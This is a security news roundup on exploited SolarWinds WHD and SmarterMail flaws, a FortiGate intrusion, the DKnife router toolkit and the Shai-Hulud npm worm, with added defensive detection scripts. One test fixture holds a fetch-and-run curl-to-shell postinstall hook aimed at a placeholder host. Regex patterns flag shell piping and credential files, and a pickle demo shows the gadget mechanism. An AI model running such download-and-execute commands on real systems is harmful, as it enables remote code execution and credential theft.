SolarWinds Web Help Desk Exploited in Multi-Stage Attacks
Microsoft has disclosed a multi-stage intrusion campaign in which threat actors exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve remote code execution, using it for initial access and then moving laterally to high-value network assets. The underlying vulnerability, tracked as CVE-2025-40551, has been added to CISA's Known Exploited Vulnerabilities catalog, with federal agencies mandated to patch by February 6, 2026.
Technical Details of the Vulnerability
The flaw lies in inadequate validation and sanitization of user-supplied parameters in the WHD web interface, specifically in the ticket creation and management workflows. Attackers send crafted HTTP requests that deliver serialized objects or command payloads to vulnerable endpoints such as /app/tickets or the administrative panels. When the server deserializes these payloads, arbitrary code executes in the context of the WHD service account, which on Windows servers often runs with elevated privileges.
Because the flaw is reachable without authentication, any instance whose web interface is exposed to the internet is open to unauthenticated remote code execution. Post-exploitation, actors establish persistence with scheduled tasks and registry Run keys, then escalate by dumping credentials with tools such as Mimikatz and reusing or forging Kerberos tickets for pass-the-ticket attacks across domain-joined systems.
Observed Attack Tactics and Infrastructure
In a February 7, 2026 incident investigated by Huntress, attackers established persistence quickly after the RCE by deploying Zoho Meetings for remote access and Cloudflare tunnels to mask command-and-control (C2) traffic. Notably, Velociraptor, a legitimate open-source DFIR tool, was repurposed for C2, using its endpoint-collection features to enumerate hosts, harvest credentials, and exfiltrate data while blending in with administrative activity.
The tactics mirror those of advanced persistent threats: initial beaconing over HTTPS to compromised domains, then Cobalt Strike beacons for lateral movement. Attackers enumerated Active Directory with BloodHound, targeting domain controllers and privileged service accounts, and staged data in encrypted ZIP archives uploaded to legitimate cloud services, where it blended in with normal outbound traffic.
Mitigation and Detection Strategies
Organizations should inventory internet-facing WHD instances using Shodan or Censys, remove them from direct exposure, and enforce network segmentation and zero-trust access controls. Apply SolarWinds' patches immediately; as a stopgap, web application firewall rules that block serialized-object payloads and anomalous parameter lengths reduce exposure but do not substitute for patching. Detection opportunities include Velociraptor processes on endpoints that are not part of the IR tooling, unexpected cloudflared tunnel processes or connections from servers, and Zoho remote-access traffic originating from internal server IPs.
Enable full request logging on the WHD web server and review POSTs to /HelpDesk/UI/ endpoints that carry base64-encoded payloads. Behavioral analytics should flag rapid deployment of tunneling tools after logon, particularly when combined with execution of forensics tooling outside standard IR playbooks.
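The log review described above, as an added example that is not part of the original report or of any SolarWinds tooling: a small triage script that parses combined-format access log lines, keeps POSTs to the watched /HelpDesk/UI/ prefix, and flags query parameters that are either a long base64 blob, begin with `rO0AB` (the base64 encoding of the Java serialization stream header 0xAC 0xED 0x00 0x05), or exceed a length threshold. The log lines and the payload value are constructed for illustration, not taken from a real exploit.

```python
import re
from urllib.parse import urlsplit

# Combined-log-format prefix: client IP, identity, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Standard or URL-safe base64 alphabet with optional padding.
B64_RE = re.compile(r'^[A-Za-z0-9+/_-]+={0,2}$')
# base64 of the Java serialization header 0xAC 0xED 0x00 0x05 always begins with this prefix.
JAVA_SER_PREFIX = "rO0AB"


def is_base64_blob(value: str, min_len: int = 40) -> bool:
    """True if the value looks like a base64 blob of at least min_len characters."""
    return len(value) >= min_len and B64_RE.match(value) is not None


def triage(lines, watched_prefixes=("/HelpDesk/UI/",), max_param_len=512):
    """Return one finding per suspicious query parameter in POSTs to watched endpoints."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        parts = urlsplit(m["uri"])
        if not parts.path.startswith(watched_prefixes):
            continue
        # Split the query by hand so '+' and '=' inside base64 are not decoded away.
        for pair in filter(None, parts.query.split("&")):
            name, _, value = pair.partition("=")
            reasons = []
            if value.startswith(JAVA_SER_PREFIX):
                reasons.append("value begins with the base64 of a Java serialization header")
            elif is_base64_blob(value):
                reasons.append("value is a long base64 blob")
            if len(value) > max_param_len:
                reasons.append(f"value length {len(value)} exceeds {max_param_len}")
            if reasons:
                findings.append({"src": m["ip"], "time": m["ts"], "path": parts.path,
                                 "param": name, "reasons": reasons})
    return findings


# Constructed sample lines. The 'data' value is an illustrative base64 string that merely
# carries the serialization-header prefix; it is not a working payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Feb/2026:10:12:01 +0000] "GET /HelpDesk/UI/Login HTTP/1.1" 200 5123',
    '10.0.0.5 - - [07/Feb/2026:10:12:09 +0000] "POST /HelpDesk/UI/Login?user=alice&password=xxxx HTTP/1.1" 302 0',
    '198.51.100.23 - - [07/Feb/2026:10:13:44 +0000] "POST /HelpDesk/UI/Tickets?data='
    'rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAAB'
    ' HTTP/1.1" 500 0',
    '198.51.100.23 - - [07/Feb/2026:10:13:52 +0000] "POST /HelpDesk/UI/Tickets?subject=' + "A" * 600 + ' HTTP/1.1" 200 211',
    '10.0.0.7 - - [07/Feb/2026:10:14:03 +0000] "POST /HelpDesk/UI/Tickets?subject=Printer+jammed&priority=2 HTTP/1.1" 200 211',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["time"], f["src"], f["path"], f["param"], "; ".join(f["reasons"]))
```

Feed it `tail -f` output or an exported log; the two hits in the constructed sample are the serialized-object parameter and the oversized `subject`. Tune `max_param_len` to your own baseline of legitimate ticket bodies before alerting on length alone.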
SmarterMail CVE-2026-24423 Fuels Ransomware Campaigns
CISA has warned that CVE-2026-24423, a critical unauthenticated remote code execution vulnerability in SmarterTools' SmarterMail, is being actively exploited in ransomware attacks, and has added it to the Known Exploited Vulnerabilities catalog.
Vulnerability Mechanics
The vulnerability is a deserialization flaw in SmarterMail's messaging API: unsanitized XML or SOAP input to endpoints such as /Services/SmarterMail.asmx is passed to an unsafe .NET deserializer. Attackers supply gadget chains built on primitives such as TypeConfuseDelegate, achieving code execution without credentials by chaining through to a Process.Start call that launches a system shell.
Affected versions range from 16.x to 18.x, and the flaw is exploitable over HTTP or HTTPS on port 8090 or whatever custom port the web interface is bound to. Public proof-of-concept exploits automate payload generation and encode the embedded command to slip past WAF signatures.
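Both deserialization flaws on this page (the WHD one above and SmarterMail's .NET API here) share one root cause: the deserializer resolves whatever type or callable the client names, so a gadget chain turns "parse this object" into "run this code". The following is an added example, not code from either vendor, and it uses Python's pickle as a stand-in for the Java and .NET formats because the mechanism and the fix are the same. `GadgetAnalog` plays the gadget chain (it names the harmless `operator.add` where a real payload would name `os.system`), `unsafe_load` is the vulnerable pattern, and `RestrictedUnpickler` is the hardened one that only resolves an allow-list of expected application types. The `Ticket` class and payloads are constructed for the demonstration.

```python
import io
import operator
import pickle


class Ticket:
    """The only type the service legitimately expects in a serialized request."""

    def __init__(self, subject: str, requester: str):
        self.subject = subject
        self.requester = requester


class GadgetAnalog:
    """Stand-in for a gadget chain. On load, the deserializer resolves and calls the
    named callable with attacker-chosen arguments. operator.add is harmless here;
    a real payload would name os.system or subprocess.Popen instead."""

    def __reduce__(self):
        return (operator.add, (40, 2))


def build_benign_payload() -> bytes:
    return pickle.dumps(Ticket("Printer jammed", "alice"))


def build_malicious_payload() -> bytes:
    return pickle.dumps(GadgetAnalog())


def unsafe_load(data: bytes):
    """Vulnerable pattern: deserialize whatever the client sent. The callable named in
    the stream runs during loading, before any application-level validation."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened pattern: only allow-listed (module, name) pairs may be resolved.
    Everything else, including builtins and stdlib callables, is refused."""

    ALLOWED = {Ticket.__module__: {"Ticket": Ticket}}

    def find_class(self, module, name):
        try:
            return self.ALLOWED[module][name]
        except KeyError:
            raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}") from None


def safe_load(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True if the hardened loader refuses the payload."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    # The vulnerable loader runs the attacker's callable: 40 + 2 is computed inside loads().
    print("unsafe_load(malicious) ->", unsafe_load(build_malicious_payload()))
    print("safe_load(benign)      ->", vars(safe_load(build_benign_payload())))
    print("safe_load(malicious) rejected:", rejects(build_malicious_payload()))
```

The .NET equivalent of the allow-list is a `SerializationBinder` that returns only known types (or, better, replacing `BinaryFormatter`/`NetDataContractSerializer` with a data-only format); in Java it is an `ObjectInputFilter`. In every case the fix is the same shape as `find_class` above: the type name in the stream is untrusted input and must be matched against an explicit list.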
Ransomware Deployment Tactics
Post-exploitation, ransomware groups, including operators of LockBit variants, deploy loaders that enumerate shares, encrypt volumes with AES-256 under RSA-4096-wrapped keys, and drop ransom notes. Before encrypting, attackers exfiltrate data with Rclone to MEGA or via OnionShare for double extortion. Persistence includes WMI event subscriptions and, in environments federated to the cloud, Golden SAML token forging.
Defensive Posture Recommendations
Patch to SmarterMail 19.4 or later, disable web services that are not needed, and restrict management interfaces to known administrative IP ranges at the firewall. Deploy EDR rules that detect ysoserial.net-style gadget payloads, anomalous PowerShell or cmd.exe children of the mail server process, and spikes in SMB share enumeration. Segmenting mail servers from domain controllers limits lateral spread.
Polish Energy Sector Breached by Static Tundra via FortiGate VPN
Russian-linked Static Tundra (Berserk Bear) exploited default credentials on exposed Fortinet FortiGate SSL VPN appliances to breach Poland's energy sector and deployed the DynoWiper destructive malware; EDR largely contained the impact and the grid was not disrupted.
Attack Vector and Initial Access
Actors targeted FortiGate SSL VPN portals whose factory-default administrator credentials had never been changed, a common condition in misconfigured OT environments. Once authenticated, they exploited further SSL VPN vulnerabilities to obtain shell access and planted web shells under /flash/scripts/ as a persistent backdoor.
Malware Analysis: DynoWiper
DynoWiper is a destructive wiper in the mould of NotPetya: it overwrites the MBR, encrypts file contents with RC4 streams, and spreads over SMB using EternalBlue and over RDP. It targets ICS protocols such as Modbus and OPC UA to corrupt PLC configurations, and propagates with stolen NTLM hashes in pass-the-hash attacks across segmented networks.
Impact and Response
Although EDR blocked full deployment, damaged ICS endpoints had to be rebuilt after forensic analysis. CERT Polska attributes the activity to the FSB based on TTP overlaps, including custom PowerShell droppers and living-off-the-land use of certutil and bitsadmin.
Hardening Critical Infrastructure
Mandate MFA on all remote access, replace factory-default credentials through automated provisioning, and segment OT networks with data diodes. Hunt for FortiGate administrator logins from Russian VPS address ranges and for the DynoWiper mutex (DynoWiperGlobal).
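The login hunt recommended above, as an added example rather than anything from CERT Polska or Fortinet: a parser for FortiGate's key=value event records and a hunt that flags successful admin-UI logins from outside a management allow-list or from watch-listed netblocks, plus SSL VPN tunnels opened with a firewall administrator account (an account that should never be used for VPN access). The field names follow FortiGate's key=value convention; the records themselves are constructed, and the TEST-NET range 203.0.113.0/24 stands in for whatever VPS ranges your threat intelligence identifies.

```python
import ipaddress
import re

# key=value pairs; values are either double-quoted (may contain spaces) or bare tokens.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_fortigate(line: str) -> dict:
    """Parse one FortiGate key=value record into a dict with quotes stripped."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def hunt(lines, mgmt_nets, watch_nets, admin_accounts=("admin",)):
    """Return findings for risky administrative access.

    - admin UI login success from an IP outside mgmt_nets, or inside watch_nets
    - SSL VPN tunnel established with a firewall admin account
    """
    mgmt = [ipaddress.ip_network(n) for n in mgmt_nets]
    watch = [ipaddress.ip_network(n) for n in watch_nets]
    findings = []
    for line in lines:
        rec = parse_fortigate(line)
        if rec.get("type") != "event":
            continue
        reasons = []
        if (rec.get("subtype") == "system" and rec.get("action") == "login"
                and rec.get("status") == "success"):
            ip = ipaddress.ip_address(rec["srcip"])
            if not any(ip in n for n in mgmt):
                reasons.append(f"admin UI login from {ip}, outside the management allow-list")
            if any(ip in n for n in watch):
                reasons.append(f"{ip} is in a watch-listed netblock")
        elif (rec.get("subtype") == "vpn" and rec.get("action") == "tunnel-up"
                and rec.get("user") in admin_accounts):
            reasons.append(f"SSL VPN tunnel opened with firewall admin account "
                           f"{rec['user']!r} from {rec.get('remip')}")
        if reasons:
            findings.append({"time": f"{rec.get('date')} {rec.get('time')}",
                             "user": rec.get("user"), "reasons": reasons})
    return findings


# Constructed sample records (format follows FortiGate's key=value style).
SAMPLE_EVENTS = [
    'date=2026-01-12 time=03:14:07 type="event" subtype="system" level="information" action="login" '
    'status="success" user="admin" ui="https(10.20.0.4)" method="https" srcip=10.20.0.4 '
    'profile="super_admin" msg="Administrator admin logged in successfully from https(10.20.0.4)"',
    'date=2026-01-12 time=03:15:41 type="event" subtype="system" level="alert" action="login" '
    'status="failed" user="admin" ui="https(203.0.113.77)" method="https" srcip=203.0.113.77 '
    'msg="Administrator admin login failed from https(203.0.113.77)"',
    'date=2026-01-12 time=03:15:49 type="event" subtype="system" level="information" action="login" '
    'status="success" user="admin" ui="https(203.0.113.77)" method="https" srcip=203.0.113.77 '
    'profile="super_admin" msg="Administrator admin logged in successfully from https(203.0.113.77)"',
    'date=2026-01-12 time=03:16:02 type="event" subtype="vpn" level="information" action="tunnel-up" '
    'tunneltype="ssl-web" user="admin" remip=203.0.113.77 tunnelip=10.212.134.200 msg="SSL tunnel established"',
    'date=2026-01-12 time=08:01:30 type="event" subtype="vpn" level="information" action="tunnel-up" '
    'tunneltype="ssl-web" user="jkowalski" remip=198.51.100.9 tunnelip=10.212.134.201 msg="SSL tunnel established"',
]
MGMT_NETS = ("10.0.0.0/8", "192.168.0.0/16")   # assumed management ranges
WATCH_NETS = ("203.0.113.0/24",)                # stand-in for intel-provided VPS ranges

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, MGMT_NETS, WATCH_NETS):
        print(f["time"], f["user"], "; ".join(f["reasons"]))
```

The failed login from the same external address immediately before the success is the password-guessing or default-credential pattern; the `tunnel-up` record that follows shows the same account being reused for VPN access. If admin logins from outside the allow-list are ever legitimate in your environment, that is itself the finding to fix.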
DKnife Toolkit Enables Router Hijacking for Espionage
China-nexus actors deploy DKnife, a Linux toolkit for compromising routers, to mount adversary-in-the-middle attacks that hijack traffic and deliver ShadowPad backdoors; the activity has targeted Chinese-speaking users since 2019.
Toolkit Capabilities
DKnife installs iptables rules to redirect traffic, poisons DNS through hosts-file modifications, and hides itself with LD_PRELOAD rootkit hooks. It proxies HTTP and HTTPS traffic through C2 infrastructure, injecting JavaScript into pages and swapping software-update downloads for trojanized Android APKs and Windows executables.
Operational Overlaps
Its infrastructure overlaps with the Spellbinder toolset, sharing C2 domains and payloads such as the DarkNimbus RAT, which provides keylogging and screen capture.
Detection and Mitigation
Monitor for rogue iptables chains, DNS queries resolving to attacker-controlled domains, and unexpected root processes. Patch router firmware, enforce certificate pinning in update clients, and deploy DNSSEC validation.
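The iptables check above, as an added example that is not part of the original report and does not reproduce DKnife's actual rules: a parser for the `*nat` table of an `iptables-save` dump that reports user-defined chains outside an expected set and any DNAT or REDIRECT rule touching DNS (53) or web (80/443) ports, which is how an on-router adversary-in-the-middle steers client traffic. The dump is constructed; the `zone_lan_prerouting` chain and the port-80 REDIRECT represent a legitimate OpenWrt-style firewall and transparent proxy that the audit is told to expect, and the `sys_pre` chain is the planted one.

```python
import shlex

BUILTIN_NAT_CHAINS = {"PREROUTING", "INPUT", "OUTPUT", "POSTROUTING"}
HIJACK_PORTS = {"53", "80", "443"}   # DNS and web: what an on-path attacker redirects


def _parse_rule(tokens):
    """Extract chain, protocol, destination ports, target and redirect destination
    from the tokens of one '-A ...' line."""
    rule = {"chain": tokens[1], "proto": None, "dports": set(), "target": None, "to": None}
    i = 2
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-p":
            rule["proto"] = tokens[i + 1]; i += 2
        elif tok == "--dport":
            rule["dports"].add(tokens[i + 1]); i += 2
        elif tok == "--dports":                 # -m multiport --dports a,b,c
            rule["dports"].update(tokens[i + 1].split(",")); i += 2
        elif tok == "-j":
            rule["target"] = tokens[i + 1]; i += 2
        elif tok in ("--to-destination", "--to-ports", "--to"):
            rule["to"] = tokens[i + 1]; i += 2
        else:
            i += 1                              # interfaces, matches, comments: ignored here
    return rule


def parse_nat_rules(dump: str):
    """Return (chain names, parsed rules) for the *nat table of an iptables-save dump."""
    chains, rules, table = set(), [], None
    for raw in dump.splitlines():
        line = raw.strip()
        if line.startswith("*"):
            table = line[1:]
        elif table == "nat" and line.startswith(":"):
            chains.add(line[1:].split()[0])
        elif table == "nat" and line.startswith("-A"):
            rules.append(_parse_rule(shlex.split(line)))
    return chains, rules


def audit_nat(dump: str, expected_chains=frozenset(), expected_redirects=frozenset()):
    """Findings: unexpected user-defined nat chains, DNAT of DNS/web traffic off-box,
    and REDIRECTs of DNS/web traffic to local ports not in expected_redirects."""
    chains, rules = parse_nat_rules(dump)
    findings = []
    for chain in sorted(chains - BUILTIN_NAT_CHAINS - set(expected_chains)):
        findings.append(f"unexpected user-defined nat chain {chain!r}")
    for r in rules:
        hit = r["dports"] & HIJACK_PORTS
        if not hit:
            continue
        ports = ",".join(sorted(hit))
        if r["target"] == "DNAT":
            findings.append(f"{r['chain']}: {r['proto']}/{ports} DNAT to {r['to']} (traffic redirected off-box)")
        elif r["target"] == "REDIRECT" and r["to"] not in expected_redirects:
            findings.append(f"{r['chain']}: {r['proto']}/{ports} REDIRECT to local port {r['to']} (possible transparent proxy)")
    return findings


# Constructed iptables-save excerpt: one legitimate zone chain plus a planted 'sys_pre' chain.
SAMPLE_DUMP = """\
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:zone_lan_prerouting - [0:0]
:sys_pre - [0:0]
-A PREROUTING -j zone_lan_prerouting
-A PREROUTING -j sys_pre
-A zone_lan_prerouting -i br-lan -p tcp --dport 80 -j REDIRECT --to-ports 8080
-A sys_pre -i br-lan -p udp --dport 53 -j DNAT --to-destination 198.51.100.5:53
-A sys_pre -i br-lan -p tcp -m multiport --dports 80,443 -j DNAT --to-destination 198.51.100.5
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
COMMIT
"""

if __name__ == "__main__":
    for finding in audit_nat(SAMPLE_DUMP, {"zone_lan_prerouting"}, {"8080"}):
        print(finding)
```

Run it against `iptables-save` (or `nft list ruleset` translated with `iptables-save` compatibility) on a golden image first to build the expected sets; anything that appears afterwards, especially DNAT of port 53 or 443 to an address outside the LAN, warrants pulling the device for analysis. A rootkit hiding its chain with LD_PRELOAD hooks on the router itself means the dump should be taken from a known-clean boot or by reading the netfilter state from a trusted rescue environment.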
Shai-Hulud Worm Ravages npm Supply Chain
The self-propagating Shai-Hulud worm compromises npm packages, steals maintainer tokens to poison more than 500 packages, exfiltrates credentials, and carries a dead man's switch.
Propagation Mechanism
Infection runs through malicious install-time lifecycle scripts that steal tokens from .npmrc and use them to republish the victim's own packages with the backdoor included. It also targets CI/CD by committing malicious GitHub Actions workflows into repositories it can reach.
Exfiltration and Impact
Harvested AWS, GCP and Azure keys are published to GitHub repositories created with the stolen GitHub token. If the worm cannot reach npm or GitHub, for instance after a takedown, its dead man's switch destroys files in the user's home directory.
Supply Chain Defenses
Rotate npm and CI tokens, verify package provenance with Sigstore-backed npm provenance attestations and scan SBOMs for affected versions, quarantine unverified packages, and disable install scripts (`ignore-scripts`) in CI.
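The quarantine step above, as an added example that is not part of the original report and does not reproduce the worm's own code: a pre-install audit that reads a package.json, reports any install-time lifecycle hook (the worm's propagation vector), and explains what the hook command appears to do, so a reviewer can decide before `npm install` runs it. Both manifests are constructed; the trojaned one uses the `.invalid` reserved domain.

```python
import json
import re

# Hooks that npm runs automatically when a package is installed as a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# (pattern, explanation) pairs for behaviours that have no business in an install hook.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads content at install time"),
    (re.compile(r"\|\s*(sh|bash)\b"), "pipes downloaded content into a shell"),
    (re.compile(r"\bnode\s+-e\b|\beval\("), "runs inline JavaScript"),
    (re.compile(r"\bbun\b"), "invokes the bun runtime (used to run a dropped payload)"),
    (re.compile(r"base64"), "encodes or decodes base64 at install time"),
    (re.compile(r"\.npmrc|NPM_TOKEN|GITHUB_TOKEN|AWS_|GOOGLE_APPLICATION_CREDENTIALS"),
     "references credential files or variables"),
]


def audit_manifest(text: str):
    """Return one finding per install-time hook present in a package.json, with the
    reasons (possibly empty) the hook command looks suspicious."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        findings.append({"package": pkg.get("name"), "hook": hook, "command": cmd, "reasons": reasons})
    return findings


def should_quarantine(text: str) -> bool:
    """Quarantine anything whose install hooks match at least one suspicious behaviour."""
    return any(f["reasons"] for f in audit_manifest(text))


# Constructed manifests: a clean release and a trojaned one that adds an install hook.
CLEAN_MANIFEST = json.dumps({
    "name": "left-pad-ish", "version": "1.0.3",
    "scripts": {"test": "node test.js"},
})
TROJANED_MANIFEST = json.dumps({
    "name": "left-pad-ish", "version": "1.0.4",
    "scripts": {
        "test": "node test.js",
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -s https://updates.example.invalid/i.sh | sh')\"",
    },
})

if __name__ == "__main__":
    for name, text in (("1.0.3", CLEAN_MANIFEST), ("1.0.4", TROJANED_MANIFEST)):
        print(name, "quarantine" if should_quarantine(text) else "ok")
        for f in audit_manifest(text):
            print("  ", f["hook"], "->", f["command"])
            for r in f["reasons"]:
                print("     -", r)
```

Point it at the tarballs a lockfile resolves to (`npm pack` and inspect `package/package.json`) rather than at the registry's rendered page, since the hook lives in the published artifact. Independently of this check, run `npm ci --ignore-scripts` in CI and set `ignore-scripts=true` in the build agent's .npmrc, so a hook that slips past review still does not execute; the few packages that genuinely need a build step can be handled with an explicit, reviewed `npm rebuild`.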